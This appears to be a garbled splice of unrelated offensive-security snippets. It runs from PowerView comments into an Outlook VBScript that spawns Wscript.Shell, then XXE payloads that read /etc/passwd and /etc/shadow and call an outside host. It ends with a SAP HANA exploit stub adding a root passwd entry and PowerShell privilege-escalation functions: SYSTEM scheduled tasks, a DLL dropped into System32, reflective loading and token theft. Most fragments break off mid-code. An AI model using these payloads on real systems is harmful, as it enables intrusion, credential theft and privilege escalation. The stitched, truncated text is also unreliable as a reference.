# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
#   Get  : retrieve full raw data sets
#   Find : 'find' specific data entries in a data set
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Outlook</title>
<script id=clientEventHandlersVBS language=vbscript>
<!--
Sub window_onload()
    Set Application = ViewCtl1.OutlookApplication
    Set cmd = Application.CreateObject("Wscript.Shell")
--------------------------------------------------------------
Vanilla, used to verify outbound XXE or blind XXE
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
import sys, hexdump, binascii
from Crypto.Cipher import AES

class AESCipher:
    def __init__(self, key):
        self.key = key

    def decrypt(self, iv, data):
        # AES-CBC decryption; a fresh cipher object is built per call because
        # CBC mode carries state (the IV) across decrypt() invocations
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return self.cipher.decrypt(data)
import os
import signal
import sys

ATTEMPTS = (100 * 1000)
bin2exec = "/usr/sap/HXE/HDB90/exe/mdc/hdbmdcdispatcher"
socketfn = "/var/lib/hdb/HXE/ipc/hdbmdcdispatcher"
passwd_entry = b"anvil:x:0:0:Anvil Ventures:/root:/bin/bash"
$confirmpreference = "none"
function Get-ScheduledTaskSystem
{
    $Name = -join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_})
    $SystemUser = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount
    $action = New-ScheduledTaskAction -Execute "powershell" -Argument " -noni -noP -sta -enc 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
function reflectit
{
<#
.SYNOPSIS
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
please read the Notes section (GENERAL NOTES) for information on how to use them.
1.) Reflectively loads a DLL or EXE in to memory of the PowerShell process.
function Ualapi
{
    Write-Host "Dropping ualapi.dll in System32 Folder..."
    if ([Environment]::Is64BitProcess)
    {
        [IO.File]::WriteAllBytes("C:\Windows\System32\ualapi.dll",[Convert]::FromBase64String("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
function GetWinLogonTokenSystem
{
    function reflectbin
    {
<#
.SYNOPSIS
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,